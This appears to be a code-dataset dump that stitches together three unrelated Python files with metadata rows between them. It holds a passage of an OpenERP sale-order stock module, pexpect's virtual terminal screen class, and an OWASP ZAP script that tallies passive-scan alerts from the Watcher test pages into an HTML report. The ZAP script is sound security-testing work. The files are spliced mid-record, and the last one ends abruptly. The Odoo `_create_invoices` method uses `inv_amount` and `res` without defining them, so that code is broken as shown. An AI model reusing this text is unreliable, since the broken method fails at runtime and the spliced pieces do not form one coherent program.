wf_service.trg_validate(uid, 'stock.picking', pick, 'button_cancel', cr)
return super(sale_order, self).action_cancel(cr, uid, ids, context=context)
def action_wait(self, cr, uid, ids, context=None):
res = super(sale_order, self).action_wait(cr, uid, ids, context=context)
for o in self.browse(cr, uid, ids):
noprod = self.test_no_product(cr, uid, o, context)
if noprod and o.order_policy=='picking':
self.write(cr, uid, [o.id], {'order_policy': 'manual'}, context=context)
return res
def procurement_lines_get(self, cr, uid, ids, *args):
res = []
for order in self.browse(cr, uid, ids, context={}):
for line in order.order_line:
if line.procurement_id:
res.append(line.procurement_id.id)
return res
def date_to_datetime(self, cr, uid, userdate, context=None):
""" Convert date values expressed in user's timezone to
server-side UTC timestamp, assuming a default arbitrary
time of 12:00 AM - because a time is needed.
:param str userdate: date string in in user time zone
:return: UTC datetime string for server-side use
"""
# TODO: move to fields.datetime in server after 7.0
user_date = datetime.strptime(userdate, DEFAULT_SERVER_DATE_FORMAT)
if context and context.get('tz'):
tz_name = context['tz']
else:
tz_name = self.pool.get('res.users').read(cr, SUPERUSER_ID, uid, ['tz'])['tz']
if tz_name:
utc = pytz.timezone('UTC')
context_tz = pytz.timezone(tz_name)
user_datetime = user_date + relativedelta(hours=12.0)
local_timestamp = context_tz.localize(user_datetime, is_dst=False)
user_datetime = local_timestamp.astimezone(utc)
return user_datetime.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return user_date.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
# if mode == 'finished':
# returns True if all lines are done, False otherwise
# if mode == 'canceled':
# returns True if there is at least one canceled line, False otherwise
def test_state(self, cr, uid, ids, mode, *args):
assert mode in ('finished', 'canceled'), _("invalid mode for test_state")
finished = True
canceled = False
write_done_ids = []
write_cancel_ids = []
for order in self.browse(cr, uid, ids, context={}):
for line in order.order_line:
if (not line.procurement_id) or (line.procurement_id.state=='done'):
if line.state != 'done':
write_done_ids.append(line.id)
else:
finished = False
if line.procurement_id:
if (line.procurement_id.state == 'cancel'):
canceled = True
if line.state != 'exception':
write_cancel_ids.append(line.id)
if write_done_ids:
self.pool.get('sale.order.line').write(cr, uid, write_done_ids, {'state': 'done'})
if write_cancel_ids:
self.pool.get('sale.order.line').write(cr, uid, write_cancel_ids, {'state': 'exception'})
if mode == 'finished':
return finished
elif mode == 'canceled':
return canceled
def _prepare_order_line_procurement(self, cr, uid, order, line, move_id, date_planned, context=None):
return {
'name': line.name,
'origin': order.name,
'date_planned': date_planned,
'product_id': line.product_id.id,
'product_qty': line.product_uom_qty,
'product_uom': line.product_uom.id,
'product_uos_qty': (line.product_uos and line.product_uos_qty)\
or line.product_uom_qty,
'product_uos': (line.product_uos and line.product_uos.id)\
or line.product_uom.id,
'location_id': order.shop_id.warehouse_id.lot_stock_id.id,
'procure_method': line.type,
'move_id': move_id,
'company_id': order.company_id.id,
'note': line.name,
}
def _prepare_order_line_move(self, cr, uid, order, line, picking_id, date_planned, context=None):
location_id = order.shop_id.warehouse_id.lot_stock_id.id
output_id = order.shop_id.warehouse_id.lot_output_id.id
return {
'name': line.name,
'picking_id': picking_id,
'product_id': line.product_id.id,
'date': date_planned,
'date_expected': date_planned,
'product_qty': line.product_uom_qty,
'product_uom': line.product_uom.id,
'product_uos_qty': (line.product_uos and line.product_uos_qty) or line.product_uom_qty,
'product_uos': (line.product_uos and line.product_uos.id)\
or line.product_uom.id,
'product_packaging': line.product_packaging.id,
'partner_id': line.address_allotment_id.id or order.partner_shipping_id.id,
'location_id': location_id,
'location_dest_id': output_id,
'sale_line_id': line.id,
'tracking_id': False,
'state': 'draft',
#'state': 'waiting',
'company_id': order.company_id.id,
'price_unit': line.product_id.standard_price or 0.0
}
def _prepare_order_picking(self, cr, uid, order, context=None):
pick_name = self.pool.get('ir.sequence').get(cr, uid, 'stock.picking.out')
return {
'name': pick_name,
'origin': order.name,
'date': self.date_to_datetime(cr, uid, order.date_order, context),
'type': 'out',
'state': 'auto',
'move_type': order.picking_policy,
'sale_id': order.id,
'partner_id': order.partner_shipping_id.id,
'note': order.note,
'invoice_state': (order.order_policy=='picking' and '2binvoiced') or 'none',
'company_id': order.company_id.id,
}
def ship_recreate(self, cr, uid, order, line, move_id, proc_id):
"""
Define ship_recreate for process after shipping exception
param order: sales order to which the order lines belong
param line: sales order line records to procure
param move_id: the ID of stock move
param proc_id: the ID of procurement
"""
move_obj = self.pool.get('stock.move')
proc_obj = self.pool.get('procurement.order')
if move_id and order.state == 'shipping_except':
current_move = move_obj.browse(cr, uid, move_id)
moves = []
for picking in order.picking_ids:
if picking.id != current_move.picking_id.id and picking.state != 'cancel':
moves.extend(move for move in picking.move_lines if move.state != 'cancel' and move.sale_line_id.id == line.id)
if moves:
product_qty = current_move.product_qty
product_uos_qty = current_move.product_uos_qty
for move in moves:
product_qty -= move.product_qty
product_uos_qty -= move.product_uos_qty
if product_qty > 0 or product_uos_qty > 0:
move_obj.write(cr, uid, [move_id], {'product_qty': product_qty, 'product_uos_qty': product_uos_qty})
proc_obj.write(cr, uid, [proc_id], {'product_qty': product_qty, 'product_uos_qty': product_uos_qty})
else:
current_move.unlink()
proc_obj.unlink(cr, uid, [proc_id])
return True
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
start_date = self.date_to_datetime(cr, uid, start_date, context)
date_planned = datetime.strptime(start_date, DEFAULT_SERVER_DATETIME_FORMAT) + relativedelta(days=line.delay or 0.0)
date_planned = (date_planned - timedelta(days=order.company_id.security_lead)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return date_planned
def _create_pickings_and_procurements(self, cr, uid, order, order_lines, picking_id=False, context=None):
"""Create the required procurements to supply sales order lines, also connecting
the procurements to appropriate stock moves in order to bring the goods to the
sales order's requested location.
If ``picking_id`` is provided, the stock moves will be added to it, otherwise
a standard outgoing picking will be created to wrap the stock moves, as returned
by :meth:`~._prepare_order_picking`.
Modules that wish to customize the procurements or partition the stock moves over
multiple stock pickings may override this method and call ``super()`` with
different subsets of ``order_lines`` and/or preset ``picking_id`` values.
:param browse_record order: sales order to which the order lines belong
:param list(browse_record) order_lines: sales order line records to procure
:param int picking_id: optional ID of a stock picking to which the created stock moves
will be added. A new picking will be created if ommitted.
:return: True
"""
move_obj = self.pool.get('stock.move')
picking_obj = self.pool.get('stock.picking')
procurement_obj = self.pool.get('procurement.order')
proc_ids = []
for line in order_lines:
if line.state == 'done':
continue
date_planned = self._get_date_planned(cr, uid, order, line, order.date_order, context=context)
if line.product_id:
if line.product_id.type in ('product', 'consu'):
if not picking_id:
picking_id = picking_obj.create(cr, uid, self._prepare_order_picking(cr, uid, order, context=context))
move_id = move_obj.create(cr, uid, self._prepare_order_line_move(cr, uid, order, line, picking_id, date_planned, context=context))
else:
# a service has no stock move
move_id = False
proc_id = procurement_obj.create(cr, uid, self._prepare_order_line_procurement(cr, uid, order, line, move_id, date_planned, context=context))
proc_ids.append(proc_id)
line.write({'procurement_id': proc_id})
self.ship_recreate(cr, uid, order, line, move_id, proc_id)
wf_service = netsvc.LocalService("workflow")
if picking_id:
wf_service.trg_validate(uid, 'stock.picking', picking_id, 'button_confirm', cr)
for proc_id in proc_ids:
wf_service.trg_validate(uid, 'procurement.order', proc_id, 'button_confirm', cr)
val = {}
if order.state == 'shipping_except':
val['state'] = 'progress'
val['shipped'] = False
if (order.order_policy == 'manual'):
for line in order.order_line:
if (not line.invoiced) and (line.state not in ('cancel', 'draft')):
val['state'] = 'manual'
break
order.write(val)
return True
def action_ship_create(self, cr, uid, ids, context=None):
for order in self.browse(cr, uid, ids, context=context):
self._create_pickings_and_procurements(cr, uid, order, order.order_line, None, context=context)
return True
def action_ship_end(self, cr, uid, ids, context=None):
for order in self.browse(cr, uid, ids, context=context):
val = {'shipped': True}
if order.state == 'shipping_except':
val['state'] = 'progress'
if (order.order_policy == 'manual'):
for line in order.order_line:
if (not line.invoiced) and (line.state not in ('cancel', 'draft')):
val['state'] = 'manual'
break
for line in order.order_line:
towrite = []
if line.state == 'exception':
towrite.append(line.id)
if towrite:
self.pool.get('sale.order.line').write(cr, uid, towrite, {'state': 'done'}, context=context)
res = self.write(cr, uid, [order.id], val)
return True
def has_stockable_products(self, cr, uid, ids, *args):
for order in self.browse(cr, uid, ids):
for order_line in order.order_line:
if order_line.product_id and order_line.product_id.type in ('product', 'consu'):
return True
return False
class sale_order_line(osv.osv):
def _number_packages(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
try:
res[line.id] = int((line.product_uom_qty+line.product_packaging.qty-0.0001) / line.product_packaging.qty)
except:
res[line.id] = 1
return res
_inherit = 'sale.order.line'
_columns = {
'delay': fields.float('Delivery Lead Time', required=True, help="Number of days between the order confirmation and the shipping of the products to the customer", readonly=True, states={'draft': [('readonly', False)]}),
'procurement_id': fields.many2one('procurement.order', 'Procurement'),
'property_ids': fields.many2many('mrp.property', 'sale_order_line_property_rel', 'order_id', 'property_id', 'Properties', readonly=True, states={'draft': [('readonly', False)]}),
'product_packaging': fields.many2one('product.packaging', 'Packaging'),
'move_ids': fields.one2many('stock.move', 'sale_line_id', 'Inventory Moves', readonly=True),
'number_packages': fields.function(_number_packages, type='integer', string='Number Packages'),
}
_defaults = {
'delay': 0.0,
'product_packaging': False,
}
def _get_line_qty(self, cr, uid, line, context=None):
if line.procurement_id and not (line.order_id.invoice_quantity=='order'):
return self.pool.get('procurement.order').quantity_get(cr, uid,
line.procurement_id.id, context=context)
else:
return super(sale_order_line, self)._get_line_qty(cr, uid, line, context=context)
def _get_line_uom(self, cr, uid, line, context=None):
if line.procurement_id and not (line.order_id.invoice_quantity=='order'):
return self.pool.get('procurement.order').uom_get(cr, uid,
line.procurement_id.id, context=context)
else:
return super(sale_order_line, self)._get_line_uom(cr, uid, line, context=context)
def button_cancel(self, cr, uid, ids, context=None):
res = super(sale_order_line, self).button_cancel(cr, uid, ids, context=context)
for line in self.browse(cr, uid, ids, context=context):
for move_line in line.move_ids:
if move_line.state != 'cancel':
raise osv.except_osv(
_('Cannot cancel sales order line!'),
_('You must first cancel stock moves attached to this sales order line.'))
return res
def copy_data(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
default.update({'move_ids': []})
return super(sale_order_line, self).copy_data(cr, uid, id, default, context=context)
def product_packaging_change(self, cr, uid, ids, pricelist, product, qty=0, uom=False,
partner_id=False, packaging=False, flag=False, context=None):
if not product:
return {'value': {'product_packaging': False}}
product_obj = self.pool.get('product.product')
product_uom_obj = self.pool.get('product.uom')
pack_obj = self.pool.get('product.packaging')
warning = {}
result = {}
warning_msgs = ''
if flag:
res = self.product_id_change(cr, uid, ids, pricelist=pricelist,
product=product, qty=qty, uom=uom, partner_id=partner_id,
packaging=packaging, flag=False, context=context)
warning_msgs = res.get('warning') and res['warning']['message']
products = product_obj.browse(cr, uid, product, context=context)
if not products.packaging:
packaging = result['product_packaging'] = False
elif not packaging and products.packaging and not flag:
packaging = products.packaging[0].id
result['product_packaging'] = packaging
if packaging:
default_uom = products.uom_id and products.uom_id.id
pack = pack_obj.browse(cr, uid, packaging, context=context)
q = product_uom_obj._compute_qty(cr, uid, uom, pack.qty, default_uom)
# qty = qty - qty % q + q
if qty and (q and not (qty % q) == 0):
ean = pack.ean or _('(n/a)')
qty_pack = pack.qty
type_ul = pack.ul
if not warning_msgs:
warn_msg = _("You selected a quantity of %d Units.\n"
"But it's not compatible with the selected packaging.\n"
"Here is a proposition of quantities according to the packaging:\n"
"EAN: %s Quantity: %s Type of ul: %s") % \
(qty, ean, qty_pack, type_ul.name)
warning_msgs += _("Picking Information ! : ") + warn_msg + "\n\n"
warning = {
'title': _('Configuration Error!'),
'message': warning_msgs
}
result['product_uom_qty'] = qty
return {'value': result, 'warning': warning}
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
context = context or {}
product_uom_obj = self.pool.get('product.uom')
partner_obj = self.pool.get('res.partner')
product_obj = self.pool.get('product.product')
warning = {}
res = super(sale_order_line, self).product_id_change(cr, uid, ids, pricelist, product, qty=qty,
uom=uom, qty_uos=qty_uos, uos=uos, name=name, partner_id=partner_id,
lang=lang, update_tax=update_tax, date_order=date_order, packaging=packaging, fiscal_position=fiscal_position, flag=flag, context=context)
if not product:
res['value'].update({'product_packaging': False})
return res
# set product uom in context to get virtual stock in current uom
if res.get('value', {}).get('product_uom'):
# use the uom changed by super call
context.update({'uom': res['value']['product_uom']})
elif uom:
# fallback on selected
context.update({'uom': uom})
#update of result obtained in super function
product_obj = product_obj.browse(cr, uid, product, context=context)
res['value']['delay'] = (product_obj.sale_delay or 0.0)
res['value']['type'] = product_obj.procure_method
#check if product is available, and if not: raise an error
uom2 = False
if uom:
uom2 = product_uom_obj.browse(cr, uid, uom, context=context)
if product_obj.uom_id.category_id.id != uom2.category_id.id:
uom = False
if not uom2:
uom2 = product_obj.uom_id
# Calling product_packaging_change function after updating UoM
res_packing = self.product_packaging_change(cr, uid, ids, pricelist, product, qty, uom, partner_id, packaging, context=context)
res['value'].update(res_packing.get('value', {}))
warning_msgs = res_packing.get('warning') and res_packing['warning']['message'] or ''
compare_qty = float_compare(product_obj.virtual_available, qty, precision_rounding=uom2.rounding)
if (product_obj.type=='product') and int(compare_qty) == -1 \
and (product_obj.procure_method=='make_to_stock'):
warn_msg = _('You plan to sell %.2f %s but you only have %.2f %s available !\nThe real stock is %.2f %s. (without reservations)') % \
(qty, uom2.name,
max(0,product_obj.virtual_available), uom2.name,
max(0,product_obj.qty_available), uom2.name)
warning_msgs += _("Not enough stock ! : ") + warn_msg + "\n\n"
#update of warning messages
if warning_msgs:
warning = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
res.update({'warning': warning})
return res
class sale_advance_payment_inv(osv.osv_memory):
_inherit = "sale.advance.payment.inv"
def _create_invoices(self, cr, uid, inv_values, sale_id, context=None):
result = super(sale_advance_payment_inv, self)._create_invoices(cr, uid, inv_values, sale_id, context=context)
sale_obj = self.pool.get('sale.order')
sale_line_obj = self.pool.get('sale.order.line')
wizard = self.browse(cr, uid, [result], context)
sale = sale_obj.browse(cr, uid, sale_id, context=context)
# If invoice on picking: add the cost on the SO
# If not, the advance will be deduced when generating the final invoice
line_name = inv_values.get('invoice_line') and inv_values.get('invoice_line')[0][2].get('name') or ''
line_tax = inv_values.get('invoice_line') and inv_values.get('invoice_line')[0][2].get('invoice_line_tax_id') or False
if sale.order_policy == 'picking':
vals = {
'order_id': sale.id,
'name': line_name,
'price_unit': -inv_amount,
'product_uom_qty': wizard.qtty or 1.0,
'product_uos_qty': wizard.qtty or 1.0,
'product_uos': res.get('uos_id', False),
'product_uom': res.get('uom_id', False),
'product_id': wizard.product_id.id or False,
'discount': False,
'tax_id': line_tax,
}
sale_line_obj.create(cr, uid, vals, context=context)
return result
| agpl-3.0 | 2,113,200,217,397,163,300 | 49.703102 | 337 | 0.57353 | false |
indashnet/InDashNet.Open.UN2000 | android/external/chromium_org/third_party/pexpect/screen.py | 171 | 11281 | """This implements a virtual screen. This is used to support ANSI terminal
emulation. The screen representation and state is implemented in this class.
Most of the methods are inspired by ANSI screen control codes. The ANSI class
extends this class to add parsing of ANSI escape codes.
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
import copy
NUL = 0 # Fill character; ignored on input.
ENQ = 5 # Transmit answerback message.
BEL = 7 # Ring the bell.
BS = 8 # Move cursor left.
HT = 9 # Move cursor to next tab stop.
LF = 10 # Line feed.
VT = 11 # Same as LF.
FF = 12 # Same as LF.
CR = 13 # Move cursor to left margin or newline.
SO = 14 # Invoke G1 character set.
SI = 15 # Invoke G0 character set.
XON = 17 # Resume transmission.
XOFF = 19 # Halt transmission.
CAN = 24 # Cancel escape sequence.
SUB = 26 # Same as CAN.
ESC = 27 # Introduce a control sequence.
DEL = 127 # Fill character; ignored on input.
SPACE = chr(32) # Space or blank character.
def constrain (n, min, max):
"""This returns a number, n constrained to the min and max bounds. """
if n < min:
return min
if n > max:
return max
return n
class screen:
"""This object maintains the state of a virtual text screen as a
rectangluar array. This maintains a virtual cursor position and handles
scrolling as characters are added. This supports most of the methods needed
by an ANSI text screen. Row and column indexes are 1-based (not zero-based,
like arrays). """
def __init__ (self, r=24,c=80):
"""This initializes a blank scree of the given dimentions."""
self.rows = r
self.cols = c
self.cur_r = 1
self.cur_c = 1
self.cur_saved_r = 1
self.cur_saved_c = 1
self.scroll_row_start = 1
self.scroll_row_end = self.rows
self.w = [ [SPACE] * self.cols for c in range(self.rows)]
def __str__ (self):
"""This returns a printable representation of the screen. The end of
each screen line is terminated by a newline. """
return '\n'.join ([ ''.join(c) for c in self.w ])
def dump (self):
"""This returns a copy of the screen as a string. This is similar to
__str__ except that lines are not terminated with line feeds. """
return ''.join ([ ''.join(c) for c in self.w ])
def pretty (self):
"""This returns a copy of the screen as a string with an ASCII text box
around the screen border. This is similar to __str__ except that it
adds a box. """
top_bot = '+' + '-'*self.cols + '+\n'
return top_bot + '\n'.join(['|'+line+'|' for line in str(self).split('\n')]) + '\n' + top_bot
def fill (self, ch=SPACE):
self.fill_region (1,1,self.rows,self.cols, ch)
def fill_region (self, rs,cs, re,ce, ch=SPACE):
rs = constrain (rs, 1, self.rows)
re = constrain (re, 1, self.rows)
cs = constrain (cs, 1, self.cols)
ce = constrain (ce, 1, self.cols)
if rs > re:
rs, re = re, rs
if cs > ce:
cs, ce = ce, cs
for r in range (rs, re+1):
for c in range (cs, ce + 1):
self.put_abs (r,c,ch)
def cr (self):
"""This moves the cursor to the beginning (col 1) of the current row.
"""
self.cursor_home (self.cur_r, 1)
def lf (self):
"""This moves the cursor down with scrolling.
"""
old_r = self.cur_r
self.cursor_down()
if old_r == self.cur_r:
self.scroll_up ()
self.erase_line()
def crlf (self):
"""This advances the cursor with CRLF properties.
The cursor will line wrap and the screen may scroll.
"""
self.cr ()
self.lf ()
def newline (self):
"""This is an alias for crlf().
"""
self.crlf()
def put_abs (self, r, c, ch):
"""Screen array starts at 1 index."""
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
ch = str(ch)[0]
self.w[r-1][c-1] = ch
def put (self, ch):
"""This puts a characters at the current cursor position.
"""
self.put_abs (self.cur_r, self.cur_c, ch)
def insert_abs (self, r, c, ch):
"""This inserts a character at (r,c). Everything under
and to the right is shifted right one character.
The last character of the line is lost.
"""
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
for ci in range (self.cols, c, -1):
self.put_abs (r,ci, self.get_abs(r,ci-1))
self.put_abs (r,c,ch)
def insert (self, ch):
self.insert_abs (self.cur_r, self.cur_c, ch)
def get_abs (self, r, c):
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
return self.w[r-1][c-1]
def get (self):
self.get_abs (self.cur_r, self.cur_c)
def get_region (self, rs,cs, re,ce):
"""This returns a list of lines representing the region.
"""
rs = constrain (rs, 1, self.rows)
re = constrain (re, 1, self.rows)
cs = constrain (cs, 1, self.cols)
ce = constrain (ce, 1, self.cols)
if rs > re:
rs, re = re, rs
if cs > ce:
cs, ce = ce, cs
sc = []
for r in range (rs, re+1):
line = ''
for c in range (cs, ce + 1):
ch = self.get_abs (r,c)
line = line + ch
sc.append (line)
return sc
def cursor_constrain (self):
"""This keeps the cursor within the screen area.
"""
self.cur_r = constrain (self.cur_r, 1, self.rows)
self.cur_c = constrain (self.cur_c, 1, self.cols)
def cursor_home (self, r=1, c=1): # <ESC>[{ROW};{COLUMN}H
self.cur_r = r
self.cur_c = c
self.cursor_constrain ()
def cursor_back (self,count=1): # <ESC>[{COUNT}D (not confused with down)
self.cur_c = self.cur_c - count
self.cursor_constrain ()
def cursor_down (self,count=1): # <ESC>[{COUNT}B (not confused with back)
self.cur_r = self.cur_r + count
self.cursor_constrain ()
def cursor_forward (self,count=1): # <ESC>[{COUNT}C
self.cur_c = self.cur_c + count
self.cursor_constrain ()
def cursor_up (self,count=1): # <ESC>[{COUNT}A
self.cur_r = self.cur_r - count
self.cursor_constrain ()
def cursor_up_reverse (self): # <ESC> M (called RI -- Reverse Index)
old_r = self.cur_r
self.cursor_up()
if old_r == self.cur_r:
self.scroll_up()
def cursor_force_position (self, r, c): # <ESC>[{ROW};{COLUMN}f
"""Identical to Cursor Home."""
self.cursor_home (r, c)
def cursor_save (self): # <ESC>[s
"""Save current cursor position."""
self.cursor_save_attrs()
def cursor_unsave (self): # <ESC>[u
"""Restores cursor position after a Save Cursor."""
self.cursor_restore_attrs()
def cursor_save_attrs (self): # <ESC>7
"""Save current cursor position."""
self.cur_saved_r = self.cur_r
self.cur_saved_c = self.cur_c
def cursor_restore_attrs (self): # <ESC>8
"""Restores cursor position after a Save Cursor."""
self.cursor_home (self.cur_saved_r, self.cur_saved_c)
def scroll_constrain (self):
"""This keeps the scroll region within the screen region."""
if self.scroll_row_start <= 0:
self.scroll_row_start = 1
if self.scroll_row_end > self.rows:
self.scroll_row_end = self.rows
def scroll_screen (self): # <ESC>[r
"""Enable scrolling for entire display."""
self.scroll_row_start = 1
self.scroll_row_end = self.rows
def scroll_screen_rows (self, rs, re): # <ESC>[{start};{end}r
"""Enable scrolling from row {start} to row {end}."""
self.scroll_row_start = rs
self.scroll_row_end = re
self.scroll_constrain()
def scroll_down (self): # <ESC>D
"""Scroll display down one line."""
# Screen is indexed from 1, but arrays are indexed from 0.
s = self.scroll_row_start - 1
e = self.scroll_row_end - 1
self.w[s+1:e+1] = copy.deepcopy(self.w[s:e])
def scroll_up (self): # <ESC>M
"""Scroll display up one line."""
# Screen is indexed from 1, but arrays are indexed from 0.
s = self.scroll_row_start - 1
e = self.scroll_row_end - 1
self.w[s:e] = copy.deepcopy(self.w[s+1:e+1])
def erase_end_of_line (self): # <ESC>[0K -or- <ESC>[K
"""Erases from the current cursor position to the end of the current
line."""
self.fill_region (self.cur_r, self.cur_c, self.cur_r, self.cols)
def erase_start_of_line (self): # <ESC>[1K
"""Erases from the current cursor position to the start of the current
line."""
self.fill_region (self.cur_r, 1, self.cur_r, self.cur_c)
def erase_line (self): # <ESC>[2K
"""Erases the entire current line."""
self.fill_region (self.cur_r, 1, self.cur_r, self.cols)
def erase_down (self): # <ESC>[0J -or- <ESC>[J
"""Erases the screen from the current line down to the bottom of the
screen."""
self.erase_end_of_line ()
self.fill_region (self.cur_r + 1, 1, self.rows, self.cols)
def erase_up (self): # <ESC>[1J
"""Erases the screen from the current line up to the top of the
screen."""
self.erase_start_of_line ()
self.fill_region (self.cur_r-1, 1, 1, self.cols)
def erase_screen (self): # <ESC>[2J
"""Erases the screen with the background color."""
self.fill ()
def set_tab (self): # <ESC>H
"""Sets a tab at the current position."""
pass
def clear_tab (self): # <ESC>[g
"""Clears tab at the current position."""
pass
def clear_all_tabs (self): # <ESC>[3g
"""Clears all tabs."""
pass
# Insert line Esc [ Pn L
# Delete line Esc [ Pn M
# Delete character Esc [ Pn P
# Scrolling region Esc [ Pn(top);Pn(bot) r
| apache-2.0 | -4,719,746,328,399,164,000 | 27.487374 | 101 | 0.571935 | false |
efdutra/zaproxy | python/scripts/watcher/watcher.py | 28 | 8154 | # Zed Attack Proxy (ZAP) and its related class files.
#
# ZAP is an HTTP/HTTPS proxy for assessing web application security.
#
# Copyright 2012 ZAP Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script tests ZAP against the Watcher test pages:
# http://www.nottrusted.com/watcher/
#
# To this script:
# * Install the ZAP Python API:
# Use ''pip install python-owasp-zap' or
# download from https://github.com/zaproxy/zaproxy/wiki/Downloads
# * Start ZAP (as this is for testing purposes you might not want the
# 'standard' ZAP to be started)
# * Access http://www.nottrusted.com/watcher/ via your browser, proxying through ZAP
# * Run the Spider against http://www.nottrusted.com/watcher/
# * Run this script
# * Open the report.html file generated in your browser
#
from zap import ZAP
import datetime
# Change this if your version of ZAP is running on a different host and/or port:
zapUrl = 'http://127.0.0.1:8090'
# Dictionary of abbreviation to keep the output a bit shorter
abbrev = {
'Cookie set without HttpOnly flag' : 'HttpOnly',\
'Cookie set without secure flag' : 'InsecureCookie',\
'Content-Type header missing' : 'NoContentHeader',\
'Cross Site Request Forgery' : 'CSRF',\
'Cross Site Scripting' : 'XSS',\
'Cross-domain JavaScript source file inclusion' : 'CrossJS',\
'HTTP Parameter Override' : 'HttpOverride',\
'IE8\'s XSS protection filter not disabled' : 'IE8XSSfilter',\
'Incomplete or no cache-control and pragma HTTPHeader set' : 'CacheControl',\
'Information disclosure - database error messages' : 'InfoDb',\
'Information disclosure - debug error messages' : 'InfoDebug',\
'Information disclosure - sensitive informations in URL' : 'InfoUrl',\
'Information disclosure - suspicious comments' : 'InfoComments',\
'Password Autocomplete in browser' : 'Auto',\
'SQL Injection' : 'SQLi',\
'SQL Injection Fingerprinting' : 'SQLfp',\
'Weak HTTP authentication over an unsecured connection' : 'WeakAuth',\
'Weak Authentication Method' : 'WeakAuth',\
'X-Content-Type-Options header missing' : 'XContent',\
'X-Frame-Options header not set' : 'XFrame'}
# The rules to apply:
# Column 1: String to match against an alert URL
# Column 2: Alert abbreviation to match
# Column 3: pass or fail
#
rules = [ \
['Check.Pasv.Cookie.HttpOnly.php', 'HttpOnly', 'pass'], \
['Check.Pasv.Cookie.Secure.php', 'InsecureCookie', 'pass'],\
['Check.Pasv.CrossDomain.ScriptReference.php', 'CrossJS', 'pass'], \
['Check.Pasv.Header.ContentTypeMissing.php', 'XContent', 'pass'], \
['Check.Pasv.Header.FrameOptions.php', 'XFrame', 'pass'],\
['Check.Pasv.Header.IeXssProtection.php', 'IE8XSSfilter ', 'pass'], \
['Check.Pasv.Header.CacheControl.php', 'CacheControl', 'pass'], \
['Check.Pasv.Header.MimeSniff.php', 'NoContentHeader', 'pass'],\
['Check.Pasv.Header.WeakAuth.php', 'WeakAuth', 'pass'], \
['Check.Pasv.InformationDisclosure.Comments.php', 'InfoComments', 'pass'], \
['Check.Pasv.InformationDisclosure.DatabaseErrors.php', 'InfoDb', 'pass'], \
['Check.Pasv.InformationDisclosure.DebugErrors.php', 'InfoDebug', 'pass'], \
['Check.Pasv.InformationDisclosure.InUrl.php', 'InfoUrl', 'pass'], \
['watcher/Check.Pasv.Cookie.Secure.php', 'InsecureCookie', 'pass'],\
]
zap = ZAP(proxies={'http': zapUrl, 'https': zapUrl})
alerts = zap.alerts
uniqueUrls = set([])
# alertsPerUrl is a disctionary of urlsummary to a dictionary of type to set of alertshortnames ;)
alertsPerUrl = {}
plugins = set([])
for alert in alerts:
url = alert.get('url')
# Grab the url before any '?'
url = url.split('?')[0]
#print 'URL: ' + url
urlEl = url.split('/')
if (len(urlEl) > 4):
if (urlEl[4][:5] != 'Check'):
continue
urlSummary = urlEl[4]
short = abbrev.get(alert.get('alert'))
if (short is None):
print 'No abreviation for: ' + alert.get('alert')
short = alert.get('alert')
aDict = alertsPerUrl.get(urlSummary, {'pass' : set([]), 'fail' : set([]), 'other' : set([])})
added = False
for rule in rules:
if (rule[0] in urlSummary and rule[1] == short):
aDict[rule[2]].add(short)
added = True
break
if (not added):
aDict['other'].add(short)
alertsPerUrl[urlSummary] = aDict
plugins.add(alert.get('alert'))
uniqueUrls.add(url)
#for key, value in alertsPerUrl.iteritems():
# print key, value
print "Alerts found"
print "------------"
for plugin in plugins:
print plugin
# Generate report file
reportFile = open('report.html', 'w')
reportFile.write("<html><head><title>ZAP Wavsep Report</title></head><body>\n")
reportFile.write("<h1><img src=\"http://zaproxy.googlecode.com/svn/trunk/src/resource/zap64x64.png\" align=\"middle\">OWASP ZAP watcher results</h1>\n")
reportFile.write("Generated: " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M") + "\n")
groupResults = []
thisGroup = ['', 0, 0]
totalPass = 0
totalFail = 0
total = 0
for key, value in sorted(alertsPerUrl.iteritems()):
if (len(value.get('pass')) > 0):
totalPass += 1
else:
totalFail += 1
# Output the summary
reportFile.write("<h3>Total Score</h3>\n")
reportFile.write("<font style=\"BACKGROUND-COLOR: GREEN\">")
for i in range (totalPass):
reportFile.write(" ")
reportFile.write("</font>")
reportFile.write("<font style=\"BACKGROUND-COLOR: RED\">")
for i in range (totalFail):
reportFile.write(" ")
reportFile.write("</font>")
total = 100 * totalPass / (totalPass + totalFail)
